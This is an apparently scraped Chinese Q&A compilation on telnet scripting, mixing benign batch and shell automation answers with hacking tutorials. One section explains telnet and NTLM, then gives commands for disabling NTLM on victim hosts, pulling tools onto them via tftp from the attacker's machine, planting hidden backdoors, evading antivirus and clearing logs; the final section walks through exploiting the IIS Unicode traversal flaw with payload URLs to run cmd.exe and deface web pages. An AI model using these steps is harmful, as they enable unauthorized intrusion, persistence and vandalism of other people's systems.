windowstelnet腳本
A. windows下,MFC 怎麼能同時telnet多台linux,並發送執行腳本的命令
兩個選擇:
1、手工編寫一個telnet命令和發送腳本的批處理;
2、用這個工具:SecureCRT
將寫好的腳本,設定到TELNET連接地址中,也可以實現。
B. 關於telnet的
一 摘要
Telnet的應用不僅方便了我們進行遠程登錄,也給hacker們提供了又一種入侵手段和後門,但無論如何,在你盡情享受Telnet所帶給你的便捷的同時,你是否真正的了解Telnet呢?
二 遠程登錄
Telnet服務雖然也屬於客戶機/伺服器模型的服務,但它更大的意義在於實現了基於Telnet協議的遠程登錄(遠程互動式計算),那麼就讓我們來認識一下遠程登錄。
1 遠程登陸的基本概念
先來看看什麼叫登錄:分時系統允許多個用戶同時使用一台計算機,為了保證系統的安全和記帳方便,系統要求每個用戶有單獨的帳號作為登錄標識,系統還為每個用戶指定了一個口令。用戶在使用該系統之前要輸入標識和口令,這個過程被稱為'登錄'。
遠程登陸是指用戶使用Telnet命令,使自己的計算機暫時成為遠程主機的一個模擬終端的過程。模擬終端等效於一個非智能的機器,它只負責把用戶輸入的每個字元傳遞給主機,再將主機輸出的每個信息回顯在屏幕上。
2 遠程登陸的產生及發展
我們可以先構想一個提供遠程文字編輯的服務,這個服務的實現需要一個接受編輯文件請求和數據的伺服器以及一個發送此請求的客戶機。客戶機將建立一個從本地機到伺服器的TCP連接,當然這需要伺服器的應答,然後向伺服器發送鍵入的信息(文件編輯信息),並讀取從伺服器返回的輸出。以上便是一個標准而普通的客戶機/伺服器模型的服務。
似乎有了客戶機/伺服器模型的服務,一切遠程問題都可以解決了。然而實際並非你想像的那樣簡單,如果我們僅需要遠程編輯文件,那麼剛才所構想的服務完全可以勝任,但假如我們的要求並不是這么簡單,我們還想實現遠程用戶管理,遠程數據錄入,遠程系統維護,想實現一切可以在遠程主機上實現的操作,那麼我們將需要大量專用的伺服器程序並為每一個可計算服務都使用一個伺服器進程,隨之而來的問題是:遠程機器會很快對伺服器進程應接不暇,並淹沒在進程的海洋里(我們在這里排除最專業化的遠程機器)。
那麼有沒有辦法解決呢?當然有,我們可以用遠程登錄來解決這一切。我們允許用戶在遠地機器上建立一個登錄會話,然後通過執行命令來實現更一般的服務,就像在本地操作一樣。這樣,我們便可以訪問遠地系統上所有可用的命令,並且系統設計員不需提供多個專用地伺服器程序。
問題發展到這里好像前途一片光明了,用遠程登錄總應該解決問題了吧,但要實現遠程登陸並不簡單。不考慮網路設計的計算機系統期望用戶只從直接相連的鍵盤和顯示器上登錄,在這種機器上增加遠程登陸功能需要修改機器的操作系統,這是極其艱巨也是我們盡量避免的。因此我們應該集中力量構造遠程登陸伺服器軟體,雖然這樣也是比較困難的。為什麼說這樣做也比較困難呢?
舉個例子來說:一般,操作系統會為一些特殊按鍵分配特殊的含義,比如本地系統將'Ctrl+C'解釋為:'終止當前運行的命令進程'。但假設我們已經運行了遠程登陸伺服器軟體,'Ctrl+C'也有可能無法被傳送到遠地機器,如果客戶機真的將'Ctrl+C'傳到了遠地機器,那麼'Ctrl+C'這個命令有可能不能終止本地的進程,也就是說在這里很可能會產生混亂。而且這僅僅是遇到的難題之一。
但盡管有技術上的困難,系統編程人員還是設法構造了能夠應用於大多數操作系統的遠程登陸伺服器軟體,並構造了充當客戶機的應用軟體。通常,客戶機軟體取消了除一個鍵以外的所有鍵的本地解釋,並將這些本地解釋相應的轉換成遠地解釋,這就使得客戶機軟體與遠地機器的交互,就如同坐在遠程主機面前一樣,從而避免了上述所提到的混亂。而那個唯一例外的鍵,可以使用戶回到本地環境。
將遠程登陸伺服器設計為應用級軟體,還有另一個要求,那就是需要操作系統提供對偽終端(pseudo terminal)的支持。我們用偽終端描述操作系統的入口點,它允許像Telnet伺服器一樣的程序向操作系統傳送字元,並且使得字元像是來自本地鍵盤一樣。只有使用這樣的操作系統,才能將遠程登陸伺服器設計為應用級軟體(比如Telnet伺服器軟體),否則,本地操作系統和遠地系統傳送將不能識別從對方傳送過來的信息(因為它們僅能識別從本地鍵盤所鍵入的信息),遠程登陸將宣告失敗。
將遠程登陸伺服器設計為應用級軟體雖然有其顯著的優點:比將代碼嵌入操作系統更易修改和控制伺服器。但其也有效率不高的缺點(後面的內容將會給予解釋),好在用戶鍵入信息的速率不高,這種設計還是可以接受的。
3 遠程登錄的工作過程
使用Telnet協議進行遠程登陸時需要滿足以下條件:在本的計算機上必須裝有包含Telnet協議的客戶程序;必須知道遠程主機的Ip地址或域名;必須知道登錄標識與口令。
Telnet遠程登錄服務分為以下4個過程:
1)本地與遠程主機建立連接。該過程實際上是建立一個TCP連接,用戶必須知道遠程主機的Ip地址或域名;
2)將本地終端上輸入的用戶名和口令及以後輸入的任何命令或字元以NVT(Net Virtual Terminal)格式傳送到遠程主機。該過程實際上是從本地主機向遠程主機發送一個IP數據報;
3)將遠程主機輸出的NVT格式的數據轉化為本地所接受的格式送回本地終端,包括輸入命令回顯和命令執行結果;
4)最後,本地終端對遠程主機進行撤消連接。該過程是撤銷一個TCP連接。
上面的內容只是討論了遠程登陸最基本的東西,其中的復雜和編程人員的艱辛是我們難以想像的,不知道你在舒服的使用Telnet的同時,是否想到了這些!
三 Telnet協議
我們知道Telnet伺服器軟體是我們最常用的遠程登錄伺服器軟體,是一種典型的客戶機/伺服器模型的服務,它應用Telnet協議來工作。那麼,什麼是Telnet協議?它都具備哪些特點呢?
1 基本內容
Telnet協議是TCP/IP協議族中的一員,是Internet遠程登陸服務的標准協議。應用Telnet協議能夠把本地用戶所使用的計算機變成遠程主機系統的一個終端。它提供了三種基本服務:
1)Telnet定義一個網路虛擬終端為遠的系統提供一個標准介面。客戶機程序不必詳細了解遠的系統,他們只需構造使用標准介面的程序;
2)Telnet包括一個允許客戶機和伺服器協商選項的機制,而且它還提供一組標准選項;
3)Telnet對稱處理連接的兩端,即Telnet不強迫客戶機從鍵盤輸入,也不強迫客戶機在屏幕上顯示輸出。
2 適應異構
為了使多個操作系統間的Telnet交互操作成為可能,就必須詳細了解異構計算機和操作系統。比如,一些操作系統需要每行文本用ASCII回車控制符(CR)結束,另一些系統則需要使用ASCII換行符(LF),還有一些系統需要用兩個字元的序列回車-換行(CR-LF);再比如,大多數操作系統為用戶提供了一個中斷程序運行的快捷鍵,但這個快捷鍵在各個系統中有可能不同(一些系統使用CTRL+C,而另一些系統使用ESCAPE)。如果不考慮系統間的異構性,那麼在本地發出的字元或命令,傳送到遠地並被遠地系統解釋後很可能會不準確或者出現錯誤。因此,Telnet協議必須解決這個問題。
為了適應異構環境,Telnet協議定義了數據和命令在Internet上的傳輸方式,此定義被稱作網路虛擬終端NVT(Net Virtual Terminal)。它的應用過程如下:
對於發送的數據:客戶機軟體把來自用戶終端的按鍵和命令序列轉換為NVT格式,並發送到伺服器,伺服器軟體將收到的數據和命令,從NVT格式轉換為遠地系統需要的格式;
對於返回的數據:遠地伺服器將數據從遠地機器的格式轉換為NVT格式,而本地客戶機將將接收到的NVT格式數據再轉換為本地的格式。
對於NVT格式的詳細定義,有興趣的朋友可以去查找相關資料。
3 傳送遠地命令
我們知道絕大多數操作系統都提供各種快捷鍵來實現相應的控制命令,當用戶在本地終端鍵入這些快捷鍵的時候,本地系統將執行相應的控制命令,而不把這些快捷鍵作為輸入。那麼對於Telnet來說,它是用什麼來實現控制命令的遠地傳送呢?
Telnet同樣使用NVT來定義如何從客戶機將控制功能傳送到伺服器。我們知道USASCII字元集包括95個可列印字元和33個控制碼。當用戶從本地鍵入普通字元時,NVT將按照其原始含義傳送;當用戶鍵入快捷鍵(組合鍵)時,NVT將把它轉化為特殊的ASCII字元在網路上傳送,並在其到達遠地機器後轉化為相應的控制命令。將正常ASCII字元集與控制命令區分主要有兩個原因:
1)這種區分意味著Telnet具有更大的靈活性:它可在客戶機與伺服器間傳送所有可能的ASCII字元以及所有控制功能;
2)這種區分使得客戶機可以無二義性的指定信令,而不會產生控制功能與普通字元的混亂。
4 數據流向
上面我們提到過將Telnet設計為應用級軟體有一個缺點,那就是:效率不高。這是為什麼呢?下面給出Telnet中的數據流向:
數據信息被用戶從本地鍵盤鍵入並通過操作系統傳到客戶機程序,客戶機程序將其處理後返回操作系統,並由操作系統經過網路傳送到遠地機器,遠地操作系統將所接收數據傳給伺服器程序,並經伺服器程序再次處理後返回到操作系統上的偽終端入口點,最後,遠地操作系統將數據傳送到用戶正在運行的應用程序,這便是一次完整的輸入過程;輸出將按照同一通路從伺服器傳送到客戶機。
因為每一次的輸入和輸出,計算機將切換進程環境好幾次,這個開銷是很昂貴的。還好用戶的鍵入速率並不算高,這個缺點我們仍然能夠接受。
5 強制命令
我們應該考慮到這樣一種情況:假設本地用戶運行了遠地機器的一個無休止循環的錯誤命令或程序,且此命令或程序已經停止讀取輸入,那麼操作系統的緩沖區可能因此而被占滿,如果這樣,遠地伺服器也無法再將數據寫入偽終端,並且最終導致停止從TCP連接讀取數據,TCP連接的緩沖區最終也會被占滿,從而導致阻止數據流流入此連接。如果以上事情真的發生了,那麼本地用戶將失去對遠地機器的控制。
為了解決此問題,Telnet協議必須使用外帶信令以便強制伺服器讀取一個控制命令。我們知道TCP用緊急數據機制實現外帶數據信令,那麼Telnet只要再附加一個被稱為數據標記(date mark)的保留八位組,並通過讓TCP發送已設置緊急數據比特的報文段通知伺服器便可以了,攜帶緊急數據的報文段將繞過流量控制直接到達伺服器。作為對緊急信令的相應,伺服器將讀取並拋棄所有數據,直到找到了一個數據標記。伺服器在遇到了數據標記後將返回正常的處理過程。
6 選項協商
由於Telnet兩端的機器和操作系統的異構性,使得Telnet不可能也不應該嚴格規定每一個telnet連接的詳細配置,否則將大大影響Telnet的適應異構性。因此,Telnet採用選項協商機制來解決這一問題。
Telnet選項的范圍很廣:一些選項擴充了大方向的功能,而一些選項制涉及一些微小細節。例如:有一個選項可以控制Telnet是在半雙工還是全雙工模式下工作(大方向);還有一個選項允許遠地機器上的伺服器決定用戶終端類型(小細節)。
Telnet選項的協商方式也很有意思,它對於每個選項的處理都是對稱的,即任何一端都可以發出協商申請;任何一端都可以接受或拒絕這個申請。另外,如果一端試圖協商另一端不了解的選項,接受請求的一端可簡單的拒絕協商。因此,有可能將更新,更復雜的Telnet客戶機伺服器版本與較老的,不太復雜的版本進行交互操作。如果客戶機和伺服器都理解新的選項,可能會對交互有所改善。否則,它們將一起轉到效率較低但可工作的方式下運行。所有的這些設計,都是為了增強適應異構性,可見Telnet的適應異構性對其的應用和發展是多麼重要。
上面討論了一些原理方面的東西,雖然我們在Telnet的使用過程中很難接觸到這一層面,但我認為了解這些是有意義的,它會給我們帶來許多啟示。下面讓我們來看看Win2000的Telnet服務。
四 Win2000的Telnet服務
其實從應用層面上,Win2000的Telnet服務並沒有什麼可說的,絕大部分內容你都可以從HELP文件中得到,我在此只是把它稍微整理一下而已。
1 基本配置
Win2000為我們提供了Telnet客戶機和伺服器程序:Telnet.exe是客戶機程序(Client),tlntsvr.exe是伺服器程序(server),同時它還為我們提供了Telnet伺服器管理程序tlntadmn.exe。
Windows 2000 默認安裝了 Telnet 服務,但是並沒有默認啟動。下面給出HELP文件中 Telnet 服務的一部分默認設置:
AllowTrustedDomain:是否允許域用戶訪問。默認值是1,允許信任域用戶訪問。可以改為0: 不允許域用戶訪問(只允許本地用戶)。
DefaultDomain:可以對與該計算機具有信任關系的任何域設置。默認值是"."。
DefaultShell:顯示 shell 安裝的路徑位置。默認值是: %systemroot%\System32\Cmd.exe /q /k
MaxFailedLogins:在連接終止之前顯示嘗試登錄失敗的最大次數。默認是3。
LoginScript:顯示 Telnet 伺服器登錄腳本的路徑位置。默認的位置就是「%systemroot%\System32\login.cmd」,你可以更改腳本內容,這樣登錄進Telnet的歡迎屏幕就不一樣了。
NTLM:NTLM身份驗證選項。默認是2。可以有下面這些值:
0: 不使用 NTLM 身份驗證。
1: 先嘗試 NTLM 身份驗證,如果失敗,再使用用戶名和密碼。
2: 只使用 NTLM 身份驗證。
TelnetPort:顯示 telnet 伺服器偵聽 telnet 請求的埠。默認是:23。你也可以更改為其他埠。
以上各項設置你可以使用tlntadmn.exe(Telnet伺服器管理程序)來進行非常方便的配置,配置後需要重新啟動Telnet服務。如圖1
2 NTLM
提到了telnet就不能不提NTLM,我想這也是讓入侵者最為頭痛的一件事,哪怕你獲得了管理員帳號和密碼,想簡單通過NTLM也並非易事,況且win2000中的telnet默認僅以NTLM方式驗證身份,這就讓我們不得不關注NTLM這個東東,那麼什麼是NTLM呢?
早期的SMB協議在網路上明文傳輸口令,後來出現了"LAN Manager Challenge/Response"驗證機制,簡稱LM,它十分簡單以至很容易被破解,微軟隨後提出了WindowsNT挑戰/響應驗證機制,即NTLM。現在已經有了更新的NTLMv2以及Kerberos驗證體系。NTLM工作流程是這樣的:
1、客戶端首先在本地加密當前用戶的密碼成為密碼散列
2、客戶端向伺服器發送自己的帳號,這個帳號是沒有經過加密的,明文直接傳輸
3、伺服器產生一個16位的隨機數字發送給客戶端,作為一個 challenge(挑戰)
4、客戶端再用加密後的密碼散列來加密這個 challenge ,然後把這個返回給伺服器。作為 response(響應)
5、伺服器把用戶名、給客戶端的challenge 、客戶端返回的 response 這三個東西,發送域控制器
6、域控制器用這個用戶名在 SAM密碼管理庫中找到這個用戶的密碼散列,然後使用這個密碼散列來加密 challenge。
7、域控制器比較兩次加密的 challenge ,如果一樣,那麼認證成功。
從上面的過程我們可以看出,NTLM是以當前用戶的身份向Telnet伺服器發送登錄請求的,而不是用你掃到的對方管理員的帳戶和密碼登錄,顯然,你的登錄將會失敗。舉個例子來說,你家的機器名為A(本地機器),你入侵的機器名為B(遠地機器),你在A上的帳戶是xinxin,密碼是1234,你掃到B的管理員帳號是Administrator,密碼是5678,當你想Telnet到B時,NTLM將自動以當前用戶的帳號和密碼作為登錄的憑據來進行上面的7項操作,即用xinxin和1234,而並非用你掃到的Administrator和5678,且這些都是自動完成的,根本不給你插手的機會,因此你的登錄操作將失敗。
由於Telnet伺服器對NTLM的使用有3個選項,所以當你Telnet遠地機器時,會顯示下面情況中的一種:
1)身份驗證選項=0時
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\為0時不使用NTML身份驗證,直接輸入用戶名和密碼,比如你可以輸入掃到的Administrator和5678
2)身份驗證選項=1時
=====================================
NTLM Authentication failed e to insufficient credentials. Please login withclear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\先嘗試 NTLM 身份驗證,如果失敗,再使用用戶名和密碼,其實這種方式對於我們來說,與上一種方式沒什麼區別
3)身份驗證選項=2時
=====================================
NTLM Authentication failed e to insufficient credentials. Please login withclear text username and password
Server allows NTLM authentication only
Server has closed connection
遺失對主機的連接。
C:\>
\\仔細看看上面的顯示,根本沒有給你輸入用戶名和密碼的機會,直接斷開連接,掃到了密碼也是白掃
所以對於入侵者來說,NTLM是橫在我們面前的一座大山,必須要除掉它,一般我們有如下幾種方法:
1通過修改遠程注冊表更改telnet伺服器配置,將驗證方式從2改為1或0;
2使用NTLM.exe,上傳後直接運行,可將telnet伺服器驗證方式從2改為1;
3在本地建立掃描到的用戶,以此用戶身份開啟telnet客戶機並進行遠程登錄;
4使用軟體,比如opentelnet.exe(需要管理員許可權且開啟IPC管道)
5使用腳本,如RTCS,(需要管理員許可權但不依賴IPC管道)
基本上是以上的5種,其中後兩種是我們比較常用的開telnet的手法,而且使用方法十分簡單,命令如下:
OpenTelnet.exe \\server username password NTLMAuthor telnetport
OpenTelnet.exe \\伺服器地址 管理員用戶名 密碼 驗證方式(填0或1) telnet埠
cscript RTCS.vbe targetIP username password NTLMAuthor telnetport
cscript RTCS.vbe <目標IP> <管理員用戶名> <密碼> <驗證方式> <tlnet埠>
五 在telnet中該做什麼
本來寫到上面就想結束了,不過許多朋友都說telnet上去後不知道該做什麼了,既然這樣,那我就拋磚引玉吧,這次不講具體做法,只是說說思路,什麼?為什麼不講具體做法?篇幅不夠嘛,以後我會一一解釋的。
1 查看系統信息
呵呵,其實就是隨處看看,看看他的系統配置和版本(用type c:\boot.ini來知道pro版或server版),看看都裝了什麼服務或軟體(從目錄名就可以知道了),看看有什麼重要或有趣的文件啦(唉,要是國外的機器,看也看不懂),看看他的用戶情況,總之就是盡可能多的了解系統,為一會裝後門摸底。
2 使用tftp傳送文件
想必大家都遇到過在telnet中傳輸文件的問題,因為我們習慣了在ipc管道中的文件傳輸,所以有些朋友喜歡用net share ipc$ 來打開管道,進而利用來傳輸文件。不過這樣反而麻煩,既然我們已經得到了shell,我們可以用TFPT命令來完成這一切,什麼是TFTP呢?
用TFTP(Trivial File Transfer Protocol)來實現文件的傳送是一種基於UDP連接的文件傳輸,一般是使用Windows自帶的tftp.exe和一個TFTP伺服器端軟體構成一個完整的傳輸結構。它是這樣使用的: 首先運行本地的TFTP Server(比如tftpd32.exe)軟體並保證始終開啟直至傳輸全部完成, 然後在telnet中(當然你也可以在其他shell中)運行下面的命令:
C:\>tftp –i ip get xinxin.exe c:\abc\xinxin.exe
其中ip為你自己機器的ip,且上傳文件要與TFTP伺服器端在同一目錄下,這樣你就可以把xinxin.exe上傳到c盤abc目錄下了(其實是從tftp伺服器下載來的)
需要指出的是,如果使用代理IP,你將不能實現與外部網路的文件傳送。因為你的代理網關在進行數據封裝的時候會將自己的IP地址加入到你的數據報中,代替你的內部網路地址,所以在外部網路進行MAC定址時是找不到你這台TFTP伺服器的。
3 安置後門
安置後門放在第二步好像早了點,如果你入侵還有其他目的,比如以破壞為主,或者是來修改主頁的,那麼這些事情當然可以在安置後門之前做;如果你只是想得到一隻肉雞,那就沒什麼可說的了,安後門吧。
後門的種類繁多,也給我們提供了很大的選擇餘地,能夠根據具體情況選擇合適的後門的確是一門學問。常用的後門一般有:木馬,asp木馬,遠程式控制制軟體,克隆帳戶,建立並隱藏帳戶,telnet,telnet擴展的shell,終端服務等。安置一個好的後門通常要注意以下幾點:
1 不會被防火牆查殺及阻礙通信:被加入病毒庫的後門最好加殼以逃過防火牆,盡量用低埠通信,以免被防火牆屏蔽。
2 最大限度增加隱蔽性:如果你選擇遠程式控制制軟體,要注意被控端的安裝提示和小圖標,以及是否同步畫面;如果你在帳戶上做文章,要盡量保持在cmd和用戶管理中都不出破綻;如果你選擇放木馬或telnet擴展,要注意文件和進程的隱藏;如果新開了終端服務(入侵前並沒有開),一定要該掉3389這個顯眼的埠,且越低越好。
3 不要當管理員不存在:這是一個大忌,許多朋友在只有默認帳戶的機器上建立類似'hacking'的管理員帳戶,真是無知者無畏呀。所以安置後門的時候,想想管理員疏忽的地方會在哪裡。
4 打補丁
如果想獨霸肉雞,就要會打補丁,要知道對肉雞的競爭是很激烈的。怎麼打補丁呢?這個也要問?想想你是怎麼進來的吧。算了,提示一下,除了修補大的漏洞以外(上傳官方補丁並運行),也要注意它的共享,ipc$共享(最好都關閉),可疑埠,容易被利用的服務等。不過打補丁也要注意隱蔽性的,不要讓管理員發現大的改動。
5 清除日誌
可以手動或利用軟體,如果不太會就去找相關教材吧,在這里我不詳細介紹了。
六 結束語
文章的前部分主要說了一些原理性的東西,後部分則側重於應用,寫的多了難免會有些遺漏。
C. windows下用批處理telnet登錄到linux執行shell腳本
實現不了的,因為telnet情況下輸入用戶名密碼後就轉邊成了linux的終端,而不再是windows的命令提示符,所有批處理命令都不能被執行了,但是你的可以實現和你要求的差不多的
@echo off
set /p IP="請輸入ip:"
telnet %IP% 22
批處理到這里就可以了,以為已經連接接下來的登陸操作linux會自動要求你輸入用戶名和密碼
輸入完畢當然也就是登陸了,直接./shell腳本加路徑就執行了
和你的要求相比也就多了./path 哈哈
D. 如何遠程調用windows上的批處理腳本
如果你想 在伺服器上運行,伺服器上的程序,就是終端。終端可以用telnet ssh等。
telnet伺服器系統自帶,ssh要在伺服器上安裝一個程序。
現在你就可以手動從本地 終端登陸伺服器了。
要想讓腳本自動登錄,有命令swawn 和 expect 寫腳本,當然這兩個命令需要客戶機環境支持。
E. 想手動添加telnet
Win2000為我們提供了Telnet客戶機和伺服器程序:Telnet.exe是客戶機程序(Client),tlntsvr.exe是伺服器程序(server),同時它還為我們提供了Telnet伺服器管理程序tlntadmn.exe。
Windows 2000 默認安裝了 Telnet 服務,但是並沒有默認啟動。下面給出HELP文件中 Telnet 服務的一部分默認設置:
AllowTrustedDomain:是否允許域用戶訪問。默認值是1,允許信任域用戶訪問。可以改為0: 不允許域用戶訪問(只允許本地用戶)。
DefaultDomain:可以對與該計算機具有信任關系的任何域設置。默認值是"."。
DefaultShell:顯示 shell 安裝的路徑位置。默認值是: %systemroot%\System32\Cmd.exe /q /k
MaxFailedLogins:在連接終止之前顯示嘗試登錄失敗的最大次數。默認是3。
LoginScript:顯示 Telnet 伺服器登錄腳本的路徑位置。默認的位置就是「%systemroot%\System32\login.cmd」,你可以更改腳本內容,這樣登錄進Telnet的歡迎屏幕就不一樣了。
NTLM:NTLM身份驗證選項。默認是2。可以有下面這些值:
0: 不使用 NTLM 身份驗證。
1: 先嘗試 NTLM 身份驗證,如果失敗,再使用用戶名和密碼。
2: 只使用 NTLM 身份驗證。
TelnetPort:顯示 telnet 伺服器偵聽 telnet 請求的埠。默認是:23。你也可以更改為其他埠。
以上各項設置你可以使用tlntadmn.exe(Telnet伺服器管理程序)來進行非常方便的配置,配置後需要重新啟動Telnet服務。如圖1
2 NTLM
提到了telnet就不能不提NTLM,我想這也是讓入侵者最為頭痛的一件事,哪怕你獲得了管理員帳號和密碼,想簡單通過NTLM也並非易事,況且win2000中的telnet默認僅以NTLM方式驗證身份,這就讓我們不得不關注NTLM這個東東,那麼什麼是NTLM呢?
早期的SMB協議在網路上明文傳輸口令,後來出現了"LAN Manager Challenge/Response"驗證機制,簡稱LM,它十分簡單以至很容易被破解,微軟隨後提出了WindowsNT挑戰/響應驗證機制,即NTLM。現在已經有了更新的NTLMv2以及Kerberos驗證體系。NTLM工作流程是這樣的:
1、客戶端首先在本地加密當前用戶的密碼成為密碼散列
2、客戶端向伺服器發送自己的帳號,這個帳號是沒有經過加密的,明文直接傳輸
3、伺服器產生一個16位的隨機數字發送給客戶端,作為一個 challenge(挑戰)
4、客戶端再用加密後的密碼散列來加密這個 challenge ,然後把這個返回給伺服器。作為 response(響應)
5、伺服器把用戶名、給客戶端的challenge 、客戶端返回的 response 這三個東西,發送域控制器
6、域控制器用這個用戶名在 SAM密碼管理庫中找到這個用戶的密碼散列,然後使用這個密碼散列來加密 challenge。
7、域控制器比較兩次加密的 challenge ,如果一樣,那麼認證成功。
從上面的過程我們可以看出,NTLM是以當前用戶的身份向Telnet伺服器發送登錄請求的,而不是用你掃到的對方管理員的帳戶和密碼登錄,顯然,你的登錄將會失敗。舉個例子來說,你家的機器名為A(本地機器),你入侵的機器名為B(遠地機器),你在A上的帳戶是xinxin,密碼是1234,你掃到B的管理員帳號是Administrator,密碼是5678,當你想Telnet到B時,NTLM將自動以當前用戶的帳號和密碼作為登錄的憑據來進行上面的7項操作,即用xinxin和1234,而並非用你掃到的Administrator和5678,且這些都是自動完成的,根本不給你插手的機會,因此你的登錄操作將失敗。
由於Telnet伺服器對NTLM的使用有3個選項,所以當你Telnet遠地機器時,會顯示下面情況中的一種:
1)身份驗證選項=0時
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\為0時不使用NTML身份驗證,直接輸入用戶名和密碼,比如你可以輸入掃到的Administrator和5678
F. 如何用shell腳本實現自動telnet-snowtty-ChinaUnix博客
Shell腳本自動Telnet並執行遠端機器的腳本
簡單使用狀況
[plain]
#!/bin/sh
(sleep 10;
echo "username";
sleep 10;
echo "password";
sleep 10;
echo "pwd";
sleep 50;
#echo exit
)|telnet $ip
這里只是連接到遠端機器,查看一下當前所在的目錄。
username/password 是telnet 到遠端機器的用戶名,密碼
sleep 是一個等待時間,根據具體的機器狀況或是執行命令的需要的時間來設置。
帶變數使用
[plain]
G. 遠程telnet寫shell腳本,如何結束腳本編寫
不要用 vi 編寫腳本,用 echo >> 寫腳本文件 ~~~ vi進去了很難出來的,你懂的
正如bat里用echo寫vbs腳本然後執行一樣。
H. ROS無法使用telnet操作,winbox下想添加腳本scripts的添加按鈕灰色
由於網上很多朋友問我怎麼入侵別人的機器,所以整理了一些我認為容易學的漏洞入侵方法,希望能給初學者一些幫助,下面講的內容很簡單,高手就不用浪費時間看了,:)
(1) UNICODE漏洞入侵
「Uicode漏洞」是微軟IIS的一個重大漏洞。2001年最熱門漏洞之一。
第一步,運行RANGSCAN掃描器,會出現掃描窗口,在最上面有兩個from的橫框,這是讓你填一段IP范圍的。在第一個框里填入啟始域(打個比方,比如你要掃192.168.0.1至192.168.0.255)那麼你在第一個框里就填入192.168.0.1,在to 後面的框里填入192.168.0.255 意思就是掃192.168.0.0至192.168.0.255這段范圍里有UNICODE漏洞的機器。接著在中間有一個添加的橫框,是要填入內容的如:
/scripts/..%c0%af../winnt/system32/cmd.exe
這句話的意思是掃描有 %c0%af 漏洞的機器,對象一般是英文的WIN2000機。
我們把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按「掃描」。就看到RANGSCAN開始掃了。這時就要看你選的IP范圍有漏洞的機器多不多了,如果你選的IP范圍好,呵,很快在掃描結果框里就會顯示掃到的漏洞主機
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主機有 %c0%af 漏洞,
目標有了,我們馬上打開瀏覽器。在網址欄里輸入:
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回車
意思是查看機器里C盤的根目錄。一般情況下,我們都可以在瀏覽器里看到類似如:
Directory of c:\
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p <DIR> Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a <DIR> Inetpub
2002-01-19 10:37p <DIR> MSSQL7
2002-03-09 04:22p <DIR> Program Files
2002-01-23 06:21p <DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目錄列表。也會碰到看不到文件的空目錄。
好,我們成功看到了機器里的C盤了。
我們在瀏覽器里輸入:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回車
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈,我們看到了機器設置內容了,我們找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主頁存放在c:\inetpub\wwwroot的目錄里,知道就好辦了。
我們用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回車
我們就可以看到c:\inetpub\wwwroot目錄里的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。我們以目錄里有index.asp做例子。
我們先要做的是把文件的只讀屬性解除掉,很多管理員都把文件設置只讀。
我們用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回車
當看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你,你可以改他的網頁了。
----------------------------------------
但如果你看到下面的英文就不成功,只好換其他機器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
繼續。現在用ECHO改網頁的內容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+網站有漏洞+> c:\inetpub\wwwroot\index.asp 回車
當看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示,你已經改了他的網頁了,呵呵,你想改成什麼字也行。只要把命令中的中文換成你自己的中文就行了。
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代碼:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
(2) Windows2000輸入法漏洞
